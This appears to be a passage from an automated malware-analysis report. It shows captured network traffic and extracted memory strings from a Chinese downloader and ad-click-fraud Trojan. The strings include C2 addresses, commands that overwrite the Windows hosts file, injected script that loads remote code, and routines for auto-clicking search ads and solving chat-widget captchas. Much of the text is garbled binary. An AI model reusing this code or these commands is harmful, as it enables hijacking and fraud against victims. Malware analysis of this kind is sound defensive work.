Expires: Sat, 22 Mar 2025 04:55:00 GMT

Age: 1934121

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Ohc-Content-Crc: 286633391

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
...........[{w....?.B.M%..);N.V2.u..N6..'...j.,A.....#2.... .R...9....
..0..o..1..q...an.,n.i...)....:......$....)|.Pr5....-x......~..D.]/...
..(..1.yz....q8U].@..^}...\E.. ..W0y.s6Y')K.x..[..S.t.I...[:......b.i.
..-K..b.N..p..:d.G......V.z....&..,.C]..})>.-.X.5M..J.&.\..#.N[..}.
....5<_...P6o.w.&.....{..f.1.1...6Z!e..,...-T.i.6\...%.0-..#...0..m
1..z.....$5|...B.J..gc..*A......u...,bq...2(.1......i.(;^...I.....<
3....,....f_.2..]r.8&VD.G..?.2.d.7p.F...Qv..I.9e....(e/.MF....'....x.b
.n.hd}.......5C.r...U6....'......iB9..R:...j..N`.W]..~..j..hx4..{.....
.....]..:>...{......l.y4..!;.~~..H.Y..l.J....tB...y.ak..D..9.......
.gn.x-. .._.j...Md..'.....7.;.H.<\.8..!.Gfn..Pdd..!5H.....d!.......
.ji5.[5.D.(.s.5.......y...fy.w.h......[[email protected]
......t..I..^E)..~......n.0*..{..An....r4...>X2Q.?.f.....y...d.r.4.
:I....#..`....].A.u!..S....-h....;......i..3A.` ....;...^...[a..{.<
.ss v.....N.027Fc..<..A.........q.y...4%.......3.w.....-P"EV,...../
......y.uw.n....a......>.(..b..6...*.G.Z|l..<.\..o.k0H.1.Es...A}
`..p.a.~.......X. ..g.......t6.'d`.O...i0..]s....! ..|3.r..4.k... 3...
.....t.lo7......-..i............;.b.....k.l.E)vL..0..A.M.B....'iV].y..
..J^...O.l..N.?....C..jq...x.. ..i.;7Y..p_.....FAM.<........T. ..1$
'q@H..\IhnB...!...B.#......HX.....S(o@...).q..y.... ..8.s..`Q.zN...~..
.g0{.g1.0>..b.3.S..0...D.......6v_..X6I6..$Q.....|[email protected]
...!i&..o..&.,a%..pOO...sZ...fB._...jZi<\......_.TT<[email protected]?.
.....M>...K.......$........E.L..t.q.v.n...E7.z...b......-]{\...<<< skipped >>>

GET /r/www/cache/static/baiduia/JSocket_9a52fc3e.swf?0.05 HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.baidu.com/

x-flash-version: 11,6,602,168

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:22 GMT

Content-Type: application/x-shockwave-flash

Content-Length: 1742

Connection: keep-alive

ETag: "6b7-51204ce9b32c0"

Last-Modified: Tue, 24 Mar 2015 08:45:39 GMT

Expires: Sat, 22 Mar 2025 04:54:58 GMT

Age: 1934124

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Ohc-Content-Crc: 2642648069

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
.............H.CWS.....x.}V[w.....m...J.$J..X...$ ."K..I.eKq.G.O..8..,
%. ...)=./...../.SN...9.s........(9NyH..7......P........4...c.....v{m.
{.|.q.p.h.........~...W..#uiuuU.....*aT.S/2O.^xw.......8....2..C..=^X.
D.....^..!mK...`/......d[km?..Q..v].2i8..........W......#"......M.?...
.....7G.1;.P.=J.~..&..Y~G.....HNm.*v..BCt{.........x~?.b.R..`3.o2.....
w.3.p..<.].q.f.......Ru%I."..... .yu.../.........Y.]..8........V~.#
.....".......D.......K .j...po}.N......?|....Eh..]lzB ......e....].<
;.Z...p..jl.h...o>...Q........A`....g.8.......$.....|....7.........
..k;n/<N..X...IX.f.~H}.t..b>M6M....".6....~0P..~.G<I.........
.w..3....=uY....=......,..{G.1j...7..y...r>s..{8.......a..Zz.......
.M..Lo5..z.f...].us._./...#.>....f........o.:.S...J2.E...!....&.3;h
.I...t.o.p-...Mp;Y.v..D.CNp.&i.#.M r...8....^......nF..J..i..Q....y.C.
P^...z8..z>1x.s.a.l..FLS......M....Z.9..e......`......X......).be..
....$]E.>Qb...N.I.,<.i.)...8l \L......!5N..i.....(..a........e..
....~.?...",.EiJ..$,..?-..A.AI,=,....VKk.o....F.....dsy.. ...A.A.A...X
..).... .E|..<......!8.......Dp..i.K..A.,.o!~......B.H.....?G...,".
%...T..!FEPC.....t..J.....\...T...P..R.....[.6..Ap..{.............m!.`
... [email protected].'......cO.._=..|.......$q`...(@...I.4`3 ..BN.P^.EE.....
1EL. RzB.3E%..T..)%..V.JI..f.......".8.&..Ei.L.Q4.J.rg.9..._..R.....1.
$..>7n.............(Q.D...f)0K..C@`Y).;..[....<....w .........c.
...~.`....5...1.............3T.....P........._l...>.."..,...9p.$...
.R.L{U1.....R..$G.%p.L3..v..5........... .Ae.Pk.U.T.N...B.`.Wy./%.<<< skipped >>>

GET /ps_default.gif?_t=1429193428663 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t11.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/gif

ETag: "1446748428"

Accept-Ranges: bytes

Last-Modified: Mon, 28 Jul 2014 10:28:31 GMT

Content-Length: 43

Date: Thu, 16 Apr 2015 14:10:27 GMT

Server: lighttpd

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Access-Con
trol-Allow-Origin: *..Content-Type: image/gif..ETag: "1446748428"..Acc
ept-Ranges: bytes..Last-Modified: Mon, 28 Jul 2014 10:28:31 GMT..Conte
nt-Length: 43..Date: Thu, 16 Apr 2015 14:10:27 GMT..Server: lighttpd..
GIF89a.............!.......,...........D..;..

GET /c.gif?t=0&q=0‡20ˆ30†60„80†30„90ˆ50Š70ˆ00…00ˆ50‹00‡20‰50ˆ20…10ˆ40‰7&p=0&pn=1 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12


HTTP/1.1 204 No Content

Cache-Control: private

Content-Type: text/html

Server: BWS/1.0

Content-Length: 0

...

GET /get?format=js&callback=setRegionCookies HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: region.ifeng.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Connection: close

Last-Modified: Thu, 16 Apr 2015 14:10:33 GMT

Server: IPServer 0.1

Date: Thu, 16 Apr 2015 14:10:33 GMT
(function(){setRegionCookies("9999_9999_[abroad][37.57.16.189]")})();.
.

GET /zztj/yeshe.html HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 1.rwdns.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 13:58:04 GMT

Server: Microsoft-IIS/6.0

Content-Length: 99

Content-Type: text/html

Set-Cookie: ASPSESSIONIDCCCTAQQC=NIMLPLLDLNEFDIBOKBANKDIM; path=/

Cache-control: private
<script src="hXXp://s6.cnzz.com/stat.php?id=4690803&web_id=4690803"
 language="JavaScript"></script>HTTP/1.1 200 OK..Date: Thu, 1
6 Apr 2015 13:58:04 GMT..Server: Microsoft-IIS/6.0..Content-Length: 99
..Content-Type: text/html..Set-Cookie: ASPSESSIONIDCCCTAQQC=NIMLPLLDLN
EFDIBOKBANKDIM; path=/..Cache-control: private..<script src="http:/
/s6.cnzz.com/stat.php?id=4690803&web_id=4690803" language="JavaScript"
></script>....


POST /SetData.asp HTTP/1.1

Referer: hXXp://VVV.baidu.com/s

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)

Content-Type: application/x-www-form-urlencoded;

Host: 1.rwdns.com

Content-Length: 66

Cache-Control: no-cache

Cookie: ASPSESSIONIDCCCTAQQC=NIMLPLLDLNEFDIBOKBANKDIM; ASPSESSIONIDAAARDQRC=DNBBGAEDALNLNGOAEMKOHIFJ

SN=ClientSetV6DomainToIp&SP='180.76.3.151','YSVC082501-2991731197'
HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 13:58:05 GMT

Server: Microsoft-IIS/6.0

Content-Length: 1

Content-Type: text/html; Charset=GB2312

Cache-control: private

1HTTP/1.1 200 OK..Date: Thu, 16 Apr 2015 13:58:05 GMT..Server: Microso
ft-IIS/6.0..Content-Length: 1..Content-Type: text/html; Charset=GB2312
..Cache-control: private..1..

The Trojan connects to the servers at the folowing location(s):

serverc.exe_676:

`.rsrc

tGHt.Ht&

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

operator

GetProcessWindowStation

USER32.DLL

<4,$?7/'

(3-!0,1'8"5.*2$

svchost.exe

ntdll.dll

Kernel32.dll

X-X-X-X-X-X

F:\ProjectCode\Downloader\WQDL\Release\Downloader.pdb

%System%

jin.exe

121.12.170.42

hXXp://121.12.115.213:1024/

hXXp://VVV.hao123.com/?tn=39005018_470_hao_pg

.?AVCTCPClient_FT@@

.?AVCXWebBrowser@@

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\serverc.exe

.text

`.rdata

@.data

.rsrc

@.reloc

hXXp://VVV.it885.com.cn/web/

__MSVCRT_HEAP_SELECT

user32.dll

KERNEL32.dll

EnumChildWindows

EnumDesktopWindows

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

WS2_32.dll

GetCPInfo

360try_dll.dll

GET %s HTTP/1.1

Referer: %s

Accept-Language: %s

User-Agent: %s

Host: %s

Cookie: %s

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)

%s-%x

%%X

%s "%s"

Applications\iexplore.exe\shell\open\command

error find windows

n%c$Eo6$

[email protected];

 %XC_L

$.pxo

B;.Sq

.SvYb

9,.AV

Bu.hh3

\.tNG

2%u;)c

C\.db

.Kx,4

C.kwFt

FJI%f

<P@;$%x

%F_8R^S(/H

=.HHA

.APQa

p%4u`

File%d

CmdTar

>BgPMsg

74Lj.DLL7(

y.ffB

X-

NotSupported

HTTP/1.E`>

6execf/

I`%sH

CTED/MSVCRTd

L6.do*

frl.modW

P'$Q%SrJ|O:

a,&.xml

(~rovalucmd=

'h%sWh

<>=\/?!>

p.DY=5

zcÁ

xKey

WUrlMkS)O

KERNEL32.DLL

COMCTL32.dll

comdlg32.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

oledlg.dll

OLEPRO32.DLL

urlmon.dll

WININET.dll

WINMM.dll

WINSPOOL.DRV

WSOCK32.dll

RegOpenKeyA

UrlMkSetSessionOption

svchost.exe

%s%s&machinename=%s&cr=yes

get_ad4.asp?type=loadall

EndViewRun.dll

OneClickRun.dll

Wsock3.dll

NoViewRun2.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32

%System%\l3codeca.acm

msacm32.drv

%sclick_log2.asp?ad_url=%s&cr=yes

%s\%s

>#>0>5>;>

FtPh

MEK%C

3MHL.TX

-c.YY,

.kIIlzx

Q{.UPC

.INC`*K@

5.Sw,5

6%F;%2

Wu.ou

T.Zfl

'pen,inmm.dll

Z7i.ctSoundCB

`Us.32.DLV%d

a.asp

%^&*()_

=xzgWEBe B

.Sa3X

.toLowerCase()x

O1.rwdns

\C2.jV

zl.oc#l76~wx

Msgw

FgNotSupportedQ

sHTTP

:7pr.ocol\

d.xB;

mG.iG8

_C.dG

zwsp.fQ

SHLWAPI.dll

RegEnumKeyA

GetWindowsDirectoryA

GetProcessHeap

GetConsoleOutputCP

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

NETAPI32.dll

PSAPI.DLL

mscoree.dll

1, 0, 0, 0

AuotIE.exe

AutoIE.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

All Files (*.*)

No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.

#Unable to load mail system support.

Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.

Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.

Disk full while accessing %1..An attempt was made to access %1 past its end.

No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.

1.0.0.1

Client.exe

serverc.exe_676_rwx_00401000_00086000:

tGHt.Ht&

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

operator

GetProcessWindowStation

USER32.DLL

<4,$?7/'

(3-!0,1'8"5.*2$

svchost.exe

ntdll.dll

Kernel32.dll

X-X-X-X-X-X

F:\ProjectCode\Downloader\WQDL\Release\Downloader.pdb

%System%

jin.exe

121.12.170.42

hXXp://121.12.115.213:1024/

hXXp://VVV.hao123.com/?tn=39005018_470_hao_pg

.?AVCTCPClient_FT@@

.?AVCXWebBrowser@@

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\serverc.exe

.text

`.rdata

@.data

.rsrc

@.reloc

hXXp://VVV.it885.com.cn/web/

__MSVCRT_HEAP_SELECT

user32.dll

KERNEL32.dll

EnumChildWindows

EnumDesktopWindows

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

WS2_32.dll

GetCPInfo

360try_dll.dll

GET %s HTTP/1.1

Referer: %s

Accept-Language: %s

User-Agent: %s

Host: %s

Cookie: %s

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)

%s-%x

%%X

%s "%s"

Applications\iexplore.exe\shell\open\command

error find windows

n%c$Eo6$

[email protected];

 %XC_L

$.pxo

B;.Sq

.SvYb

9,.AV

Bu.hh3

\.tNG

2%u;)c

C\.db

.Kx,4

C.kwFt

FJI%f

<P@;$%x

%F_8R^S(/H

=.HHA

.APQa

p%4u`

File%d

CmdTar

>BgPMsg

74Lj.DLL7(

y.ffB

X-

NotSupported

HTTP/1.E`>

6execf/

I`%sH

CTED/MSVCRTd

L6.do*

frl.modW

P'$Q%SrJ|O:

a,&.xml

(~rovalucmd=

'h%sWh

<>=\/?!>

p.DY=5

zcÁ

xKey

WUrlMkS)O

KERNEL32.DLL

COMCTL32.dll

comdlg32.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

oledlg.dll

OLEPRO32.DLL

urlmon.dll

WININET.dll

WINMM.dll

WINSPOOL.DRV

WSOCK32.dll

RegOpenKeyA

UrlMkSetSessionOption

svchost.exe

%s%s&machinename=%s&cr=yes

get_ad4.asp?type=loadall

EndViewRun.dll

OneClickRun.dll

Wsock3.dll

NoViewRun2.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32

%System%\l3codeca.acm

msacm32.drv

%sclick_log2.asp?ad_url=%s&cr=yes

%s\%s

>#>0>5>;>

FtPh

MEK%C

3MHL.TX

-c.YY,

.kIIlzx

Q{.UPC

.INC`*K@

5.Sw,5

6%F;%2

Wu.ou

T.Zfl

'pen,inmm.dll

Z7i.ctSoundCB

`Us.32.DLV%d

a.asp

%^&*()_

=xzgWEBe B

.Sa3X

.toLowerCase()x

O1.rwdns

\C2.jV

zl.oc#l76~wx

Msgw

FgNotSupportedQ

sHTTP

:7pr.ocol\

d.xB;

mG.iG8

_C.dG

zwsp.fQ

SHLWAPI.dll

RegEnumKeyA

GetWindowsDirectoryA

GetProcessHeap

GetConsoleOutputCP

mscoree.dll

1, 0, 0, 0

AuotIE.exe

AutoIE.exe

{8856F961-340A-11D0-A96B-00C04FD705A2}

All Files (*.*)

No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.

#Unable to load mail system support.

Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.

Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.

Disk full while accessing %1..An attempt was made to access %1 past its end.

No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.

1.0.0.1

Client.exe

misse.exe_1928:

.text

`.rdata

@.data

.rsrc

SSSSh

F%D,3

SHLWAPI.dll

DeleteUrlCacheEntry

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

InternetOpenUrlA

HttpQueryInfoA

WININET.dll

WS2_32.dll

WINMM.dll

MFC42.DLL

MSVCRT.dll

_acmdln

KERNEL32.dll

GetAsyncKeyState

GetKeyState

USER32.dll

GDI32.dll

ShellExecuteA

SHELL32.dll

ole32.dll

OLEAUT32.dll

MSVCP60.dll

AdSpirit.exe

.PAVCException@@

Winmm.dll

DSound.dll

ws2_32.dll

t.bat

echo %s >> %System%\drivers\etc\hosts

echo 127.0.0.1 localhost >> %System%\drivers\etc\hosts

echo #New Hosts > %System%\drivers\etc\hosts

attrib -r %System%\drivers\etc\hosts

Hosts.txt

window.external

CEXWebBrowser

51la.htm

TaskA.dat

hXXp://222.186.32.57:11860/

C:\Tasks

Web365

findURLFinished

setImgURL

fillKeywordFinished

TaskExecuter

VVV.baidu.com

m.baidu.com

DogURL

findURL()

VCodeHandler.Refresh()

fillKeyword('

53kf|baidu|zoossoft|live800|pop800|tq|365webcall|qycn|5251|livechatvalue|looyu|jianke

getReadyForChat(%s,'%s')

VCodeHandler.Fill('

%s.exe

%d %d

2.jpg

1.jpg

.?AV?$bind_t@XU?$mf1@XVTaskExecuter@@H@_mfi@boost@@V?$list2@V?$value@PAVTaskExecuter@@@_bi@boost@@V?$value@H@23@@_bi@3@@_bi@boost@@

.?AV?$bind_t@XU?$mf1@XVTaskExecuter@@PAUsCheckStep@@@_mfi@boost@@V?$list2@V?$value@PAVTaskExecuter@@@_bi@boost@@V?$value@PAUsCheckStep@@@23@@_bi@3@@_bi@boost@@

.?AV?$bind_t@XU?$mf2@XVTaskExecuter@@VCString@@V2@@_mfi@boost@@V?$list3@V?$value@PAVTaskExecuter@@@_bi@boost@@V?$value@VCString@@@23@V423@@_bi@3@@_bi@boost@@

%s.dll

taska.dat

PersonalInfoHandler.ashx?action=get_Rand2

TaskHandler.ashx?action=get_RandTaskB

FeedBackHandler.ashx?action=add

%s%s&sex=%s

%s%s&url=%s&succeed=%s

DM2.dll

VC_SWT.dll

VC_53KF.dll

VC_DKB.dll

hXXp://222.186.32.156:8888/

hXXp://222.186.32.156:8889/

51la2.htm

logs.txt

IFreeKeyCode

IInitKeyCode

80100628--(@b?gx.`8sGFq!)~8{.y`M**A%NVL.zVuyb?*5mq*9AuWa`ZG[u(rqrW4D]~uY&6

80100628--!F48v@-lxGFFZ#hQ.> |Lin>qV^Dw?RofUN[UuBIgwqSÑ%W.E.5r*rM[3.mJ3Y

right-curly-bracket

left-curly-bracket

mobileMode = window.location.host.indexOf("m.baidu.com") > -1;

window.setInterval("bd_hideHead()", 500);

var _bdHead = document.getElementById("head");

if (_bdHead != null && window.location.href.indexOf("baidu") > -1)

_bdHead.style.display = "none";

targetElement = getTargetURL();

targetElement.setAttribute("target", "_top");

var scrollTop = document.documentElement.scrollTop;

var scrollLeft = document.documentElement.scrollLeft;

var clientHeight = document.documentElement.clientHeight;

var clientWidth = document.documentElement.clientWidth;

var eleHeight = targetElement.offsetHeight;

var eleWidth = targetElement.offsetWidth;

eleOffset = targetElement.getBoundingClientRect();

if (eleOffset.top > clientHeight - eleHeight)

scrolledTop = scrollTop   eleOffset.top;

if (eleOffset.top < 0)

scrolledTop = scrollTop - Math.abs(eleOffset.top);

if (eleOffset.left > clientWidth - eleWidth)

scrolledLeft = scrollLeft   eleOffset.left;

if (eleOffset.left < 0)

scrolledLeft = scrollLeft - Math.abs(eleOffset.left);

window.scrollTo(scrolledLeft, scrolledTop);

left: eleOffset.left   o, right: -(o * 2),

top: eleOffset.top   o, bottom: -(o * 2)

x = posOffset.left   getRValue(0, (eleWidth > clientWidth ? clientWidth : eleWidth)   posOffset.right);

y = posOffset.top   getRValue(0, (eleHeight > clientHeight ? clientHeight : eleHeight)   posOffset.bottom);

window.external.findSRTargetFinished(isFound, x, y);

window.external.findSRTargetFinished(false, 0, 0);

function getTargetURL() {

if (targetElements.length == 1)

else if (targetElements.length > 1)

return targetElements[getRValue(0, targetElements.length)];

var exp_urls = domains.replace(".", "\\.");

var r_urls = null, r_dataClick = new RegExp(exp_dataClick);

r_urls = new RegExp(exp_urls);

eles = document.all;

if (eles.length > 0) {

for (var i = 0; i < eles.length; i  ) {

if (eles[i].tagName == "A") {

var className = eles[i].className;

var c1 = className == "ec-header-title" && r_urls.test(eles[i].getAttribute("ourl"));

var c2 = className == "ec-logo" && r_urls.test(eles[i].getAttribute("data-mu"));

target_eles.push(eles[i]);

parentEle = document.getElementById("content_left");

eles = parentEle == null ? null : parentEle.children;

if (eles != null && eles.length > 0) {

attr_dataClick = eles[i].outerHTML;

if (r_dataClick.test(attr_dataClick))

temp_eles.push(eles[i]);

ele_innerText = eles[i].innerText;

if (r_urls.test(ele_innerText)) {

var t_ele = eles[i].children[0].children[0].children[0];

if (t_ele.tagName.toLocaleLowerCase() == "a" && t_ele.getAttribute("href").indexOf("baidu.php?url") > -1)

target_eles.push(t_ele);

t_ele = eles[i].children[0].children[1].children[0].children[0];

switch (eles[i].tagName) {

if (eles[i].children[0].tagName == "SCRIPT")

parentEle = document.getElementById("ec_im_container");

if (r_dataClick.test(attr_dataClick)) {

target_eles.push(eles[i].children[0]);

var r_urls = new RegExp(exp_urls);

if (r_urls.test(ele.innerText))

target_eles.push(ele.children[0]);

var keywords = ["<object", "<embed"];

keywords = [];

var url = succeedFlag.url;

var text = succeedFlag.text;

var isSucceed = url != "" && window.location.href.indexOf(url) > -1 ||

text != "" && document.body.innerText.indexOf(text) > -1;

window.external.submitResult(isSucceed);

window.external.submitResult(false);

window.external.submitResult(true);

window.setInterval("findSucceedFlag2()",1000);

String.prototype.replaceAll = function (oldStr, newStr) {

return result.replace(new RegExp(oldStr, "gm"), newStr);

function findURL() {

var tipsURL, fileName, delayMinutes, m;

m = scriptEle.getAttribute("d");

tipsURL = scriptEle.getAttribute("uri");

fileName = tipsURL.substring(tipsURL.lastIndexOf("/")   1, tipsURL.lastIndexOf("."));

if (tipsURL.length > 0 && fileName.length > 0)

window.external.findURLFinished(tipsURL, fileName, delayMinutes);

return document.getElementById(id);

return Math.floor(Math.random() * end   start);

for (var i = 0; i < document.all.length; i  ) {

var ele = document.all[i];

if (ele.className.toLowerCase().indexOf(className.toLowerCase()) > -1)

eles.push(ele);

var eles = document.getElementsByTagName("embed");

for (var i = eles.length - 1 ; i >= 0 ; i--) {

eles[i].parentElement.removeChild(eles[i]);

for (var i = 0; i < keywords.length; i  ) {

if (content.indexOf(keywords[i]) > -1)

whiteList = whiteList.replaceAll("\.", "\.");

window.open = function (url) {

if (expFilter.test(url) == false)

window.external.catchNewWindow(url);

var frameCount = document.getElementsByTagName("iframe").length;

frameCount  = document.getElementsByTagName("frame").length;

window.external.foundMultiFrames();

window.external.returnFrameIndex(FrameIndex);

window.alert = function (msg) {

window.external.logError("

"   msg);

window.external.logError(succeedFlag == null ?"F":succeedFlag.text);

if (succeedFlag != null && msg.indexOf(succeedFlag.text) > -1)

window.external.submitResult(true);

window.onerror = function (msg, url, lineno) {

"   msg   ",URL

"   url);

window.confirm = function (msg) { return true; }

window.showModelessDialog = null;

window.showModalDialog = null;

window.focus = function () { }

window.open = function (url) { return null; }

window.close = function () { }

window.showHelp = null;

window.onbeforeunload = null;

window.onunload = null;

window.prompt = null;

document.write = function (content) {

window.external.document_write(content);

if (document.head != null) {

var s = document.createElement("script");

s.setAttribute("type", "text/javascript");

s.setAttribute("src", "hXXp://222.186.38.66:8888/ext.js");

document.head.appendChild(s);

window.attachEvent("onsubmit", function () {

var formTarget = window.event.srcElement.getAttribute("target");

else if (formTarget.toLowerCase().indexOf("blank") > -1)

window.attachEvent("onload", function () {

var CSSTypes = { "BDBridge": 0, "KF53": 1, "SWT": 2, "POP800": 3, "Live800": 4, "TQKF": 5, "DKB": 6, "CC": 7, "Web365": 8, "Talk99": 12, "IBangKF": 10, "HXT": 11,"JianKe":13 };

if (window.firewall_img)

if (this.isReady)

if (window.firewall_img != undefined)

var image_times = $('#firewall_uuid_img').attr('image_times'); if (image_times < -1)

$.getJSON('imgValidate.php?firewall_uuid='   firewall_uuid   '&action=imgCode&'   Math.random(), function (data) {

var image_times = data.image_times; var imagedata = data.image_data; var codesize = data.result_size.length; var isMhtml = !-[1, ] && !('prototype' in Image);

var image_url = "";

image_url = 'url("mhtml:hXXp://'   location.host   '/imgValidate.php?firewall_uuid='   firewall_uuid   '&action=ie&'   Math.random()   '!locoloco")';

$('#firewall_uuid_img').css('background-image', image_url).attr('codesize', codesize).attr('image_times', image_times);

image_url = 'url("data:image/gif;base64,'   imagedata   '")';

window.external.setBase64(imagedata);

updateChatState(StateIDs.FoundVCode);

_this.ImgContainer = gel(_this.ImgContainerId);

_this.InputContainer = gel(_this.InputContainerId);

return _this.ImgContainer != null && _this.InputContainer != null;

this.isReady = initEles();

return this.isReady;

this.InputContainer = gel(this.InputContainerId);

return this.InputContainer != null;

if (this.HasVCode()) {

this.InputContainer.value = identRet;

this.InputContainer.onkeyup();

this.CopyToClipBoard();

if (!this.GetReady())

VCodeImgEle = this.ImgContainer;

identRet = identRet.toString();

if (this.HasVCode())

this.InputContainer.value = identRet.length < 4 ? "0000" : identRet;

if (window.collectionstart != undefined)

var iframes = document.getElementsByTagName("iframe");

for (var i = 0; i < indexs.length; i  ) {

if (iframes.length > indexs[i]) {

doc = iframe.contentWindow.document;

if (doc.getElementById("authCode") != null)

if (doc.getElementById("clientCardForm") != null)

iframe = _this.GetFrame();

_this.InputContainer = iframe.contentWindow.document.getElementById("authCode");

if (_this.InputContainer == null)

_this.ImgContainer = _this.InputContainer.parentElement.nextSibling.children[0];

if (_this.ImgContainer == null)

window.external.setImgURL("hXXp://"   document.domain   "/winCode.800?id="   h_id   "&v="   new Date().getTime());

updateChatState(StateIDs.FoundVCode);

return gel("ym-window").style.display == "";

var iframe = VCodeCaptures.POP800.GetFrame();

var win = iframe.contentWindow;

win.$("#authCode").trigger("change");

var eleOffset = iframe.getBoundingClientRect();

var btnSubmit = win.$(".button_blue").get(0);

var btnSubmitOffset = btnSubmit.getBoundingClientRect();

x = eleOffset.left   btnSubmitOffset.left   20;

y = eleOffset.top   btnSubmitOffset.top   10;

window.external.clickOn(x, y);

window.setTimeout("ADSPIRIT_POP800_Func()", 3000);

this.FeedBackURL();

this.ImgContainer = gel(this.ImgContainerId);

if (this.InputContainer == null)

this.InputContainer = gel("valiFigureCB");

